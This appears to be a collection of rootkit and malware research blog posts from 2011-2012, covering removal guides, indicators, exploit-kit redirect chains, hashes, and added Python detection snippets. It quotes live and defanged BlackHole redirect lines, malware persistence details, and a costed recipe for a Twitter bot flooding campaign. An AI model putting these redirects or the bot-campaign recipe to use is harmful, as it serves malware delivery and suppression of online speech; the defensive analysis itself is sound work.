Channel: A blog about rootkits research and the Windows kernel

TDL FS dumpers

Kaspersky tdsskiller http://support.kaspersky.com/downloads/utils/tdsskiller.exe
ESET tdlfsreader http://eset.ru/tools/TdlFsReader.exe

tdsskiller first.

First, edit the options: set "Checking TDL FS" to On.

Perform the scan.

The rootkit is found.

For "TDSS File System", do not choose "skip"; set the action to "copy to quarantine".

Go to the tdsskiller log in the root of the system volume, C:.

The rootkit's files were saved to %system_volume%:\TDSSKiller_Quarantine\Date_and_Time\.

Directory with dumped objects: .dta files are the dumped objects, .ini files hold information about each dumped object.

Next, try tdlfsreader.

Objects are dumped to the TDL_FS directory inside the current folder.


ZeroAccess detection with Xuetr tool

Xuetr is a powerful tool for hidden-code/rootkit detection (available for download from http://www.xuetr.com/download/XueTr.zip).
Run it on a machine infected with the latest ZeroAccess rootkit.

After it starts, it shows an alert.

Next, look at the "Kernel module" tab.

Xuetr found two ZeroAccess drivers; we can dump them.

Next, check the kernel for suspicious actions: Kernel->Object Hijack.

Note that the system driver ipsec.sys was hijacked, and some pointers in the hard disk's device object were hijacked too.

The IPsec service in the registry, from which the rootkit starts.





Necurs rootkit detection

Detailed information (and droppers too) is available at
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=897
http://www.kernelmode.info/forum/viewtopic.php?f=14&t=1177&p=8933#p8859

It blocks the drivers of many AV tools:

 GMER

 tdsskiller

 Xuetr

 Rku

After it starts, it creates the device NtSecureSys.

Detection (for example, with VBA Antirootkit):

Kernel modules

Device stack: it attaches itself to the Tcp device

Hooks the NtOpenProcess and NtOpenThread functions in the SSDT

Registers a registry callback for self-defence and a load-module notify callback to prevent AV drivers from loading.

The rootkit driver is locked on disk.

Tdsskiller in your hands for deletion :)

Skip the error message.

Perform the scan.

The malicious service is detected; set the action to "delete".

A reboot is needed...

New BlackHole features

I looked at MDL today and suddenly discovered the following:

A new method of BlackHole spreading. The JS has the form:

document.location='http://westarray.com/main.php?page=a68ea0edbb97ee5c';

ISC wrote about this, and also that BlackHole now spreads ZeroAccess/Sirefef.

Further information is from this note: http://isc.sans.edu/diary/Updates+on+ZeroAccess+and+BlackHole+front+/12079


So, the first update I would like to bring is the new resilient infrastructure adopted by the BlackHole Exploit Kit.

BlackHole panel

The most common method used by BlackHole to spread is via links inside phishing emails.

For example:

1) Phishing email contains a link to a website
2) The website contains a redirection to a BH website

But recently they improved this method by adding another layer:

1) Phishing email contains a link to a website
2) The website contains four links like:

 #h1#WAIT PLEASE#/h1#

 #h3#Loading...#/h3#

#script language="JavaScript" type="text/JavaScript" src="hXXp://www.kvicklyhelsinge[.]dk/js.js"##/script#

#script language="JavaScript" type="text/JavaScript" src="hXXp://michellesflowersltd[.]co.uk/js.js"##/script#

#script language="JavaScript" type="text/JavaScript" src="hXXp://myescortsdirectory[.]com/js.js"##/script#

#script language="JavaScript" type="text/JavaScript" src="hXXp://nitconnect[.]net/js.js"##/script#

 3) Each JS.JS contains a redirection to a final website that contains the BH Exploit kit:

-> document.location='hXXp://matocrossing[.]com/main.php?page=206133a43dda613f';

That makes it really easy for the author to update to new websites, and at the same time makes it harder for a takedown.
After that you already know what happens: it will check your system and select the best exploit for it, like a PDF exploit.
For some time it was mostly delivering FakeAV and infostealer trojans, like ZeuS and SpyEye, but just recently it started to change...

That brings us to the second update: ZeroAccess

ZeroAccess is not something new... in fact it has been around for some years, but it is showing some very interesting development. One recent BH exploit kit is delivering a Downloader trojan. This downloader is then downloading two additional trojans, a ZeroAccess and a ZeuS trojan.
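As an added example (not part of the original post or the ISC diary), a small Python checker that pulls the redirect-chain indicators described above out of a captured page: remote `<script src=".../js.js">` includes and `document.location` redirects to a `main.php?page=<16 hex>` landing URL, the two shapes shown in the post. The sample HTML and js.js body are constructed here and use reserved `.invalid` domains.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page, modelled on the two-stage layout described in the post:
# a "WAIT PLEASE / Loading..." decoy plus several remote js.js includes.
SAMPLE_LANDING_HTML = """
<html><body>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script language="JavaScript" type="text/JavaScript" src="http://redirector-one.invalid/js.js"></script>
<script language="JavaScript" type="text/JavaScript" src="http://redirector-two.invalid/js.js"></script>
<script type="text/javascript" src="/static/site.js"></script>
</body></html>
"""

# Constructed body of one fetched js.js (the page value is the one quoted in the post).
SAMPLE_JS_JS = "document.location='http://exploit-host.invalid/main.php?page=206133a43dda613f';"

# document.location='<url>' assignments, and the main.php?page=<16 hex> landing shape.
LANDING_RE = re.compile(r"""document\.location\s*=\s*['"]([^'"]+)['"]""")
BH_PAGE_RE = re.compile(r"/main\.php\?page=[0-9a-f]{16}$")


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.sources.append(value)


def remote_js_includes(html, page_host):
    """Return script includes that load a js.js from a host other than the page itself."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    hits = []
    for src in collector.sources:
        parsed = urlparse(src)
        if parsed.netloc and parsed.netloc != page_host and parsed.path.endswith("/js.js"):
            hits.append(src)
    return hits


def blackhole_redirects(js_text):
    """Return document.location targets whose URL has the main.php?page=<hex16> shape."""
    return [url for url in LANDING_RE.findall(js_text) if BH_PAGE_RE.search(url)]


def analyse_chain(html, page_host, fetched_js):
    """fetched_js maps each include URL to its body (constructed here; fetched in practice).

    Returns the suspicious includes and, per include, the landing URLs found in it.
    """
    includes = remote_js_includes(html, page_host)
    landings = {src: blackhole_redirects(fetched_js.get(src, "")) for src in includes}
    return {"includes": includes, "landings": landings}
```

An empty landing list for an include means the script could not be fetched or has rotated, which in this scheme is expected and is itself worth logging.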

Russian's election - hall of shame

1) On election day.

Intermediate results:

146,47 % - special wrapping for the pro-Kremlin party.

2) DDoS attacks on social networks and media such as St. Petersburg Novaya Gazeta, KartaNarusheniy.ru, Golos.org, LiveJournal, Twitter, NewTimes.ru.

http://globalvoicesonline.org/2011/12/05/russia-election-day-ddos-alypse/

I asked Group-IB (a Russian cyber crime investigation lab) about an investigation of this incident. But the answer is obvious...

3) A wave of arrests and detentions of protesters.

4) Detention of Navalny.
http://www.itar-tass.com/c32/290980.html

5)

Thousands of Twitter accounts apparently created in advance to blast automated messages are being used to drown out Tweets sent by bloggers and activists this week who are protesting the disputed parliamentary elections in Russia, security experts said.

http://krebsonsecurity.com/2011/12/twitter-bots-drown-out-anti-kremlin-tweets/

Russians fight Twitter and Facebook battles over Putin election
Protests against president's party escalate across social media with flood of automated counterattacks and alleged hacking

http://www.guardian.co.uk/world/2011/dec/09/russia-putin-twitter-facebook-battles

6) DDoS attacks on Brian Krebs's Twitter account: a huge number of followers every second.

7) The founder of vkontakte.ru, Pavel Durov, has been summoned for interrogation by the FSB (aka KGB).

This country is still in the hands of the KGB...

UPDATE: Full list of bots against the demonstrations: http://ec2-50-19-134-213.compute-1.amazonaws.com/users.txt.

How Twitter attacks can be implemented (Neej):

For anyone that doesn't know, this type of attack (if it can be called that) can be done cheaper than you may think - peanuts in fact.

Although I imagine it's likely that customised tools were used for this, if you yourself wanted to do this:

$150 will get you a license for the TweetAttacks Pro application which automates posting pretty much how you want - it automates adding real-looking content using services such as SocialOomph (or any other website actually). It uses a web browser to do all its work, making it undetectable by Twitter. It includes an account creator which can offload captcha solving to third parties ($1.50 per 1000 if you choose the Death By Captcha service, for example).

In addition, to mount an attack using 1000s of accounts, private proxies are required - Brian has already done articles on criminal activity surrounding the provision of such services; however, there are longstanding (whitehat, I'm assuming) companies which will lease you http proxies for $1 per proxy per month - the price goes down as you order more, of course. So let's say you use 100 Twitter accounts per proxy - another $100 if you chose to attack using 5000 Twitter accounts. (You probably only need them for a month if all you wish to do is this attack, but I went two months so you can dribble out tweets like happened in the real thing to make the accounts look real.)

And lastly you need a moderately powerful server - nothing too extreme by any means. Say you wanted high levels of service - you could rent an OVH Kimsufi KS16G dedicated server for ~75 USD (they're priced in Euros so it depends on exchange rates).

This server is probably massive overkill and could be had for a lot less. Add $15 or so (?) for a Windows license; however, many people just run Windows inside a VM to avoid this added cost.

Spend some time setting up your software (this will take a fair amount of time, from my experience using Twitter to market solutions to people - but it can easily be outsourced through Teamviewer or other methods for peanuts) and there you go: your own Twitter blasting machine for ~$300 USD (likely less if you went for less powerful hardware) with which you can overwhelm any movement you don't happen to like.

Social media can be a great thing but at the same time it has a tremendous capacity to be gamed.

SpyEye removing with Xuetr tool

SpyEye is a well-known trojan that steals your private data.
Also known as EyeStye (Microsoft) and Pincav (Kaspersky).
It can be identified by any anti-rootkit: only user-mode hooks, no driver.
The purpose of the hooks is self-defence: hiding the registry key it starts from, hiding its file on disk, and intercepting private information.
A lot of hooks in processes.

It registers itself in autorun at HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run.

Hidden autostart item.

Hidden directory with the module.

Removal instructions: delete the autorun item from the registry and the hidden folder on disk. After a reboot, your system is clean.

It was discussed here: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=93.


DorkBot/NgrBot removing

Worm:Win32/Dorkbot.I is a worm based on IRC communication (DorkBot family) with backdoor features.

Also known as NgrBot and IRCBot.

Like SpyEye, it may capture private user data such as user names and passwords. The threat may block some security websites.

Also like SpyEye, it hides its data and actions from your eyes with a user-mode rootkit component. No driver on board, so it will be detected by any anti-rootkit.

Hooks:

It installs itself into the %AppData% directory and, after a reboot, loads from
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\

It also downloads other threats (Zeus, in my case zaberg.exe).

Hidden files and keys:

For removal (with Xuetr):

Set the special settings that disable some of the malware's actions:

Next, delete the files, including the downloaded ones, and the registry values.

After that, perform a special reboot.





Top threats of the last two weeks (20 Dec '11 - 3 Jan '12)

20 Dec '11 - 3 Jan '12
  • New wave of Sinowal/Mebroot spreads.
  • Wave of French ransoms - Trojan Ransom.
  • At start of first week - Winlock/WindowsSecurity.
  • FakeRean (Rogue:Win32/FakeRean), covers: XP Antispyware 2012, XP Home Security 2012.
  • ZeroAccess/Sirefef rootkit.
Sources:
  • tracking malware links - VxVault, MDL
  • kernelmode

Top threats of the week 3 Jan '12 - 7 Jan '12


3 Jan '12 - 7 Jan '12
  • Sinowal/Mebroot.
  • NgrBot/DorkBot/IRCBot.
  • Caphaw.A - Backdoor.
  • Password stealers (ZBot/SpyEye).
  • Ramnit.
  • Rogue: FakeRean, Winlock/Ransom, WindowsSecurity.
  • Cridex.

BlackHole spreads more and more malware

The trend of the last weeks is BlackHole and the fact that it spreads many types of malware. In fact, it is password stealers and ransomware from which attackers get the most profit.

So, the most widespread BH payloads are:

  • GEMA ransomware - Trojan:Win32/Lockscreen.BO.
  • Win32/Sinowal rootkit with password stealer payload.
  • Ramnit password stealer.
  • FakeRean - Fake AV with various GUI covers.
  • ZBot/SpyEye - similar password stealers (including, Trojan:Win32/Bublik.B).
  • Reveton.A - private data stealer.

Top threats of the month, Jan 2012

In the first month of the new year 2012, in general, a lot of various ransomware, fake antiviruses and password stealers were observed. In the first quarter of January there was a new type of ransomware, Reveton. It spreads via the BlackHole EK and is a downloader of ransomware/malicious HTML pages (with JS) in various languages (Italian, Spanish, German, UK English and French).

Of the fake AVs, FakeRean was the most active; it has new covers and also spreads from BH.
As usual, the FakePoliceAlert ransomware was active: French, which replaces the explorer.exe file, GEMA, and "Firefox", a ransomware for German users.

GEMA looks like this.

French.

So, the threats are:
  • FakeAV (Defmid, FakeRean, FakeScanti, FakeSysdef, FakeVimes, Winwebsec).
  • Ransomware: Reveton, French, GEMA, German.
  • Sinowal password stealer with a bootkit component, observed via BH.
  • Various password stealers, including OnlineGames-like and ZBot-like ones, and ZBot itself.
  • SpyEye (also samples with FUD status).
  • Caphaw.A backdoor.
  • ZeroAccess.
Note: all threats were observed with the help of public malware source trackers and honeypots.

New ZBot modifications


BlackHole spreads ZeroAccess/Sirefef

Together with Kafeine, I observed that the BlackHole group that distributed Carberp in the past now distributes ZeroAccess.
All samples had FUD status. A couple of hashes:


Community: Microsoft broke the rules in the ZBot takedown case

The beginning of the story, briefly:
http://www.anti-malware.ru/forum/index.php?showtopic=21983

Microsoft decided to strike at (disrupt) the infrastructure of a botnet whose bots are based on the original ZBot/SpyEye code. This happened at the end of March, on the 25th.

The main point:
http://blogs.technet.com/b/microsoft_blog/archive/2012/03/25/microsoft-and-financial-services-industry-leaders-target-cybercriminal-operations-from-zeus-botnets.aspx

Materials for review (court statements):
http://www.zeuslegalnotice.com/
Especially: http://www.zeuslegalnotice.com/images/Summons.pdf

It was assumed that, as in previous botnet takedowns, MS would hand this data over to law enforcement for further investigation.

However, Fox-IT http://blog.fox-it.com/2012/04/12/critical-analysis-of-microsoft-operation-b71/
pointed out inaccuracies (in their opinion) in this Microsoft operation. Apart from some technical details of the seizure of servers and decoy domains, they drew attention to the information about the defendants and where it was obtained from, as well as to the tangle of bot code bases and their versions. Note that such information had not been published before. It was this last point that forced Microsoft to explain to the community how information from the underground surfaced.

Let us set aside for now everything we know about the authors, the bots and so on, and look at the situation from a slightly different angle.

Fox-IT writes:
In the affidavits you can find a great deal of that information that is freely available on the Internet. It is interesting to notice that this is presented as verifiable facts just because it was available on a website or as a download. These websites and documents are statements of questionable source and it goes too far to actually go into every detail of each paper, but when I was reading it I found many presented facts which I know to be incorrect. For example one of the included whitepapers states that the latest version at the time of writing in 2010 of the ZeuS Trojan would be version 1.6, which is simply false. The last ZeuS version in the major version 1 is actually 1.3.X.X, which was released by the end of 2009 and further updated with fixes in the beginning of 2010. And version 1.4 was actually never really released and not for sale, but was merely the beta version for the 2.0 release which was released in 2010.

The most important part:

This last part [John Does information] brings us on the most interesting part of this whole write up on operation b71, we were surprised to see the contents of the Summons.pdf and the declaration of Debenham. This includes a lot of information on actors involved within the ZeuS operations, the SpyEye author and individual SpyEye users but also completely unrelated actors. This information includes nicknames, email addresses, icq numbers and jabber addresses.


And when looking at those details we found some interesting details on some of the described John Does. The information therein was 100% identical to information we had supplied to a certain mailing list. This mailing list has the restriction that data being shared can only be used with the permission of the person who supplied that data. The information was in exactly the same order and contained exactly the same amount of information on those John Does that we and also a friendly information security company had provided. Since the order and amount of information was 100% identical, and the data then also being used out of context and misinterpreted, this meant that the person who interpreted it did not have the right background to fully understand the data.


For us this felt as a major blow as we spent a lot of time in getting this kind of information, while a corporate giant like Microsoft is now using this information without reaching out to the persons who supplied that information, for their own marketing and public relation purposes. From our end we can confirm that this information was never supplied for the purposes that Microsoft used it for. This whole action of Microsoft brings a major blow to the entire information sharing between information security companies on mailing lists and working groups.



So it is obvious that Microsoft (or rather the DCU, Digital Crimes Unit) had to explain itself, which it did, see
Besides, it is considered that Microsoft got ahead of itself by filing civil suits against the above-named John Does.

Malware collection and research

Guys, I have been collecting malware over the last few months. If you need information, MD5s or samples for research purposes, leave a message on the post or send a message to my VT profile at https://www.virustotal.com/user/rkhunter/ (if you are part of the VT community).

In general it includes:

- Caphaw backdoor
- Carberp
- Cridex
- Dorkbot/Ngrbot
- Drstwex
- FakeAV
     - Defmid
     - FakeRean
     - FakeSysdef
     - FakeVimes
     - Winwebsec
- Fareit passwords stealer
- Gamarue
- IRCBot
- Ransomware
     - FakePoliceAlert
     - GEMA (Ransirac)
     - French (Ransom.FL)
     - WindowsSecurity
     - Reveton
- Ramnit
- Simda backdoor
- Sinowal
- SpyEye
- ZBot/Zeus
- ZeroAccess
- Ursnif


Bootkits - the survival trend of malware in today's conditions

So, briefly, to the point, and putting the emphasis in the right places.
Let us begin with what Symantec wrote almost a year ago. The article was called Are MBR Infections Back in Fashion?
I am translating their material because it contains a lot of useful information. It also helps to assemble the material on bootkits into some kind of overall picture.
Symantec writes:

Infecting the MBR opens up great possibilities for further deep infection of the computer and for gaining control over it, which makes the idea attractive to malware writers. Modern MBR infection methods are a rather complex task, within the reach not of all malware authors but only of highly qualified ones. This is probably one of the reasons why the creators of Trojan.Mebroot did not get that many followers after the MBR infection technique was rediscovered in 2007 (based on the work done by eEye Digital Security in 2005 in the BootRoot project). Mebroot was a complex piece of malware; it also had direct disk access to write its code into disk sectors, thereby keeping the OS unaware of its existence. This type of low-level infection, combined with a sophisticated rootkit component, makes it hard to identify and to clean. The way to defeat it is to get access to the disk bypassing the rootkit's hooks, or to gain control before the infected MBR is executed.
While MBR infection was a mainstay for Mebroot from the very beginning, another gang, responsible for such a complex threat as Backdoor.Tidserv (originally infecting drivers), decided that they too would deal with the MBR. They adopted the MBR infection mechanism in the summer of 2010 for Backdoor.Tidserv.L and later versions. Alongside Mebroot and Tidserv, a number of other threats also appeared between 2008 and 2010 that used the MBR infection method, for example Trojan.Mebratix and Trojan.Bootlock.
Fast forward to the present, and the picture of MBR-infecting malware has changed considerably. By 2011 we had seen threats such as Backdoor.Tidserv.M, Trojan.Smitnyl, Trojan.Fispboot, Trojan.Alworo and Trojan.Cidox. These statistics show an increase in the amount of malware that uses the boot period (in particular, the MBR) as a way to infect machines. It should also be noted that a significant part of the groundwork for bootkits had already been done by researchers earlier. When researchers published the details of BootRoot and VBootkit, malware authors literally took these developments and PoCs and simply adapted them for their own needs. According to our observations, we can say that a significant number of MBR-infecting malware families borrowed the technique from the concept project BootRoot. The appearance of short-lived ransomware (MBRLock) lent weight to this idea. Ransomware is made for a single purpose and is not expected to operate for long, so the people who write it do not want to spend much time and effort on building it or on hiding it on the machine. This contrasts sharply with the more advanced backdoor examples, whose creators try to build a useful and robust zombie network to extract profit. It is a sign that the barrier to entry for this type of malware has been lowered. At present, all recent malware attacking the boot period targets the MBR, with the exception of Trojan.Cidox, which uses a somewhat different approach. Instead of the MBR, it infects the Initial Program Loader to achieve a similar overall effect.


So, the main capabilities that bootkits (or boot-period malware) provide:
  • The ability to start before the OS and thus gain control over it.
  • As a consequence of the first point, hiding the malicious payload from AV detectors (which rely on OS facilities).
  • Practically the only way to start one's own kernel-mode code on x64.

Flamer goes ITW

The original CrySyS research is very detailed and useful: http://www.crysys.hu/skywiper/skywiper.pdf.

The CrySyS report was updated with Kaspersky's information about the mssecmgr.ocx structure.

On an infected machine (symptoms of infection):

Kaspersky: the Stuxnet dropper contains a Flame-like component in a resource: http://www.securelist.com/en/blog/208193568/Back_to_Stuxnet_the_missing_link



Flamer has an uninstaller module [browse32.ocx] - Symantec: http://www.symantec.com/connect/blogs/flamer-urgent-suicide


Microsoft Security Advisory (2718704)
Unauthorized Digital Certificates Could Allow Spoofing
http://technet.microsoft.com/en-us/security/advisory/2718704
http://support.microsoft.com/kb/2718704



Aliases:
CrySys: sKyWIper
MS: Worm:Win32/Flame.A
Kaspersky: Worm.Win32.Flame.a
Symantec: W32.Flamer
McAfee: SkyWiper

mssecmgr.ocx by McAfee http://blogs.mcafee.com/enterprise/security-perspectives/skywiper-fanning-the-flames-of-cyber-warfare
soapr32.ocx analysis http://stratsec.blogspot.com/2012/05/flame-component-soapr32ocx.html
msglu32.ocx analysis http://stratsec.blogspot.com/2012/05/flame-msglu32ocx-component-that-can.html
mssecmgr.ocx description by Kaspersky http://www.securelist.com/en/blog/208193538/Flame_Bunny_Frog_Munch_and_BeetleJuice
mssecmgr.ocx by Symantec http://www.symantec.com/connect/blogs/painting-picture-w32flamer

hashes by Sophos http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/W32~Flame-Gen/detailed-analysis.aspx

More hashes and date info http://labs.alienvault.com/labs/index.php/2012/how-old-is-flame/
Hashes and dates by McAfee http://blogs.mcafee.com/mcafee-labs/what-the-skywiper-files-tell-us

Symantec: http://www.symantec.com/connect/blogs/flamer-highly-sophisticated-and-discreet-threat-targets-middle-east
Flamer: A Recipe for Bluetoothache http://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache

Kaspersky: http://www.securelist.com/en/blog/208193522/The_Flame_Questions_and_Answers
Flame: Replication via Windows Update MITM proxy server http://www.securelist.com/en/blog/208193566/Flame_Replication_via_Windows_Update_MITM_proxy_server

Tool for removal from BitDefender http://labs.bitdefender.com/2012/05/cyber-espionage-reaches-new-levels-with-flamer/

W32.Flamer: Spreading Mechanism Tricks and Exploits http://www.symantec.com/connect/blogs/w32flamer-spreading-mechanism-tricks-and-exploits

Bit9: https://www.bit9.com/files/Threat_Advisor_Flame_FINAL.pdf

List of hashes will be updated...
#malware #cyberwar #APT

ZeroAccess - new steps in evolution

ZeroAccess was updated about a month ago. As we remember, previous versions contained a rootkit with VFS functionality and a modern self-defence method against AV scanners. It also infected drivers by hijacking their files on disk.
After the version with the ring0 rootkit, the rootkit was removed from the malware droppers [and, it seems, from the malware project too]. In this version the malware authors changed the active infection technique, moving it entirely to user mode. It uses this run key for autostart:

You can also check for its presence by these files/directories:

C:\WINDOWS\assembly\GAC\Desktop.ini
C:\WINDOWS\Installer\{UUID}\@
C:\WINDOWS\Installer\{UUID}\n
C:\WINDOWS\Installer\{UUID}\L\
C:\WINDOWS\Installer\{UUID}\U\
C:\Documents and Settings\User\Local Settings\Application Data\{UUID}
C:\Documents and Settings\User\Local Settings\Application Data\{UUID}\L
C:\Documents and Settings\User\Local Settings\Application Data\{UUID}\U
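As an added example (not from the original post), a Python matcher that checks a directory listing against the file and directory indicators above. The {UUID} placeholder is expanded to a GUID pattern, and hits are grouped by GUID so the same identifier can be confirmed both under %WINDIR%\Installer and under the user's Local Settings\Application Data, which is the layout the post describes. The listing below is constructed, with a benign Installer entry included to show it is not flagged.

```python
import re
from collections import defaultdict

# Windows GUID in braces, e.g. {01234567-89ab-cdef-0123-456789abcdef}
GUID = r"\{[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}\}"
INSTALLER = r"^[A-Za-z]:\\WINDOWS\\Installer\\(" + GUID + r")\\"
APPDATA = r"^[A-Za-z]:\\Documents and Settings\\[^\\]+\\Local Settings\\Application Data\\(" + GUID + r")"

# Indicator paths from the post; a trailing backslash is optional so "...\L\" also
# matches a directory listed as "...\L".
INDICATORS = {
    "gac_desktop_ini": re.compile(r"^[A-Za-z]:\\WINDOWS\\assembly\\GAC\\Desktop\.ini$", re.I),
    "installer_at": re.compile(INSTALLER + r"@$", re.I),
    "installer_n": re.compile(INSTALLER + r"n$", re.I),
    "installer_L": re.compile(INSTALLER + r"L\\?$", re.I),
    "installer_U": re.compile(INSTALLER + r"U\\?$", re.I),
    "appdata_root": re.compile(APPDATA + r"\\?$", re.I),
    "appdata_L": re.compile(APPDATA + r"\\L\\?$", re.I),
    "appdata_U": re.compile(APPDATA + r"\\U\\?$", re.I),
}

# Constructed directory listing; the GUID is a made-up value.
SAMPLE_LISTING = [
    r"C:\WINDOWS\assembly\GAC\Desktop.ini",
    r"C:\WINDOWS\Installer\{11111111-2222-3333-4444-555555555555}\@",
    r"C:\WINDOWS\Installer\{11111111-2222-3333-4444-555555555555}\n",
    r"C:\WINDOWS\Installer\{11111111-2222-3333-4444-555555555555}\L",
    r"C:\WINDOWS\Installer\{11111111-2222-3333-4444-555555555555}\U",
    r"C:\Documents and Settings\User\Local Settings\Application Data\{11111111-2222-3333-4444-555555555555}",
    r"C:\Documents and Settings\User\Local Settings\Application Data\{11111111-2222-3333-4444-555555555555}\L",
    r"C:\Documents and Settings\User\Local Settings\Application Data\{11111111-2222-3333-4444-555555555555}\U",
    r"C:\WINDOWS\Installer\{AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE}\product.msi",  # benign MSI cache entry
    r"C:\WINDOWS\system32\services.exe",
]


def scan_paths(paths):
    """Match a listing against the indicators and group hits by the GUID they share.

    Returns (hits, guids): hits maps indicator name -> matching paths,
    guids maps each GUID seen -> sorted list of indicator names found under it.
    """
    hits = defaultdict(list)
    guids = defaultdict(set)
    for path in paths:
        for name, pattern in INDICATORS.items():
            m = pattern.match(path.strip())
            if m:
                hits[name].append(path)
                if m.groups():
                    guids[m.group(1).lower()].add(name)
    return dict(hits), {g: sorted(v) for g, v in guids.items()}


def likely_infected(paths):
    """Heuristic from the post's layout: one GUID present both under
    %WINDIR%\\Installer and under Local Settings\\Application Data."""
    _, guids = scan_paths(paths)
    for names in guids.values():
        if any(n.startswith("installer_") for n in names) and any(n.startswith("appdata_") for n in names):
            return True
    return False
```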



Currently they have changed tactics again. ZeroAccess now has a cross-platform file infector. As an infector, it targets the system file services.exe; see http://en.wikipedia.org/wiki/Service_Control_Manager.
It infects this file on x32 as well as on x64.
The infected x32 services.exe looks like this:
As you can see, shellcode was injected into the ScRegisterTCPEndpoint function.
Moreover, ZeroAccess stores the loader of the main payload in an Extended Attribute of the file (an additional NTFS attribute).
The shellcode in ScRegisterTCPEndpoint reads the EA into a buffer and transfers control to it. The EA holds another shellcode, a mini-loader, and a PE file (a DLL).
The shellcode from ScRegisterTCPEndpoint transfers execution to the shellcode from the EA.

The shellcode from the EA looks like this:

Its main purpose is to extract the DLL from the EA and load it.

Dropper:

MD5: c6e73a75284507a41da8bef0db342400
SHA1: 23e1f3a819e4e4af58c4a6d5eb489b90ebd7ae8f

And of course the AV guys were as fast as possible :(


Removing Pushbot worm with your hands

This research concerns a fresh version of the Pushbot worm, Worm:Win32/Pushbot.VR.

Dropper:

MD5: 3e50b76c0066c314d224f4fd4cbf14d5
SHA1: 8284814c5c5cb0f37fe200b918b65ef89c259a0a

It infects via a Facebook spreading campaign. Details: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=1385&start=10#p14221.

Copies itself to
C:\Documents and Settings\root\Local Settings\Application Data\random
C:\Documents and Settings\root\Start Menu\Programs\Startup\random

Runs from
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\random

List of processes for infection in memory:
msnmsgr.exe
msmsgs.exe
opera.exe
skype.exe
firefox.exe
iexplore.exe
calc.exe
jusched.exe
explorer.exe

Instructions for removal:

1. Suspend all processes in the list above to stop the injected code from acting.

2. Kill the main module: the process that is always resident in memory.

3. Kill all the processes you suspended.
4. Run explorer.exe.

5. Remove the main malware module from both locations.
6. Run regedit and remove the autostart item.

7. Reboot.

Interesting malware of the month: trends and hashes


Interesting malware that was already discussed last month.

1. ZeroAccess/Sirefef was updated, with a cross-platform file infector and shellcode.

SHA1: 23e1f3a819e4e4af58c4a6d5eb489b90ebd7ae8f
MD5: c6e73a75284507a41da8bef0db342400

2. Stuxnet droppers with a Flamer proto-component inside.

SHA1: 46104bf26300a5fb7a4f799d80e141b95465d0cc
MD5: 2fb979eb3e8d8b1571cdd0df33427969

SHA1: 6da3bb3face857638d0af027f52933b037e48c57
MD5: d705ae2f0b0a21e48d42c6ffdf5a171c

3. ZBot droppers with an original anti-emulation crypter/packer.

SHA1: 01125257e3baf7132345d93e60560cd19ca29914
MD5: 612700f68e7e9c62c3c754cdeff6caa5

MD5: 31cf2ccf68f7a1619557b4419df695a7
SHA1: f88a9ddf11fa6a897c555ce9116dba931fde22c5

4. Cleaman.G trojan with hosts-file modification features and a ring-3 "rootkit".

SHA1: 8d502546c344a16c66ff4ee82dda3004343d3ff9
MD5: 1cb27d4ecd25c2030ebb6a1a9b7e3321

5. Pushbot worm spreading via Facebook, with a ring-3 "rootkit" feature.

SHA1: 8284814c5c5cb0f37fe200b918b65ef89c259a0a
MD5: 3e50b76c0066c314d224f4fd4cbf14d5

6. Trojan/Win32.OnlineGameHack - a Korean game cheater and AV killer, targeting the AhnLab-V3 AV.

SHA1: 53b1ce48f2b0cf3c7028184676be7b21485bd45a
MD5: ab551ebc28e4cbcdcb44b1175e14038b

7. Simona trojan - a Korean multi-AV killer targeting Kaspersky, Avast and others, with a rootkit (FSD driver hooking).

SHA1: 9d810d82ed897d32c3874cb093ad82b79a176303
MD5: 3083f4301416130f0e42ace95261645c